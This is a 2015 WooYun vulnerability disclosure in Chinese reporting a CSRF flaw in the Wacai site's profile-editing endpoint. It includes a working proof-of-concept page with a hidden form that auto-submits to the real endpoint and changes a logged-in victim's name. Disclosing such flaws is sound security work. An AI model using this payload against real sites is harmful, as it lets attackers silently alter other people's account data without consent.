当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109013

漏洞标题:挖财网信息修改存在CSRF

相关厂商:杭州财米科技有限公司

漏洞作者: S0cial

提交时间:2015-04-24 11:23

修复时间:2015-04-29 11:24

公开时间:2015-04-29 11:24

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

修改资料的地方没token验证

详细说明:

QQ截图20150419132754.png


Post提交没有token验证
构造代码

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF</title>
</head>
<style>
form{
display: none;
}
</style>
<body>
<form method="post" action="https://www.wacai.com/user/um_saveUserInfo.action" id="edit">
<input name="user.name" type="text" value="Wooyun">
<!--
<input name="user.sex" type="text" value="1">
<input name="user.birth" type="text">
<input name="user.province" type="text">
<input name="user.city" type="text">
<input name="user.married" type="text" value="0">
<input name="user.education" type="text" value="0">
<input name="user.job" type="text" value="0">
<input name="user.income" type="text" value="0">
-->
</form>
</body>
<script>
document.getElementById("edit").submit();
</script>
</html>


打开后资料变成如下

QQ截图20150419133610.png

漏洞证明:

QQ截图20150419133610.png

修复方案:

Token

版权声明:转载请注明来源 S0cial@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 11:24

厂商回复:

最新状态:

暂无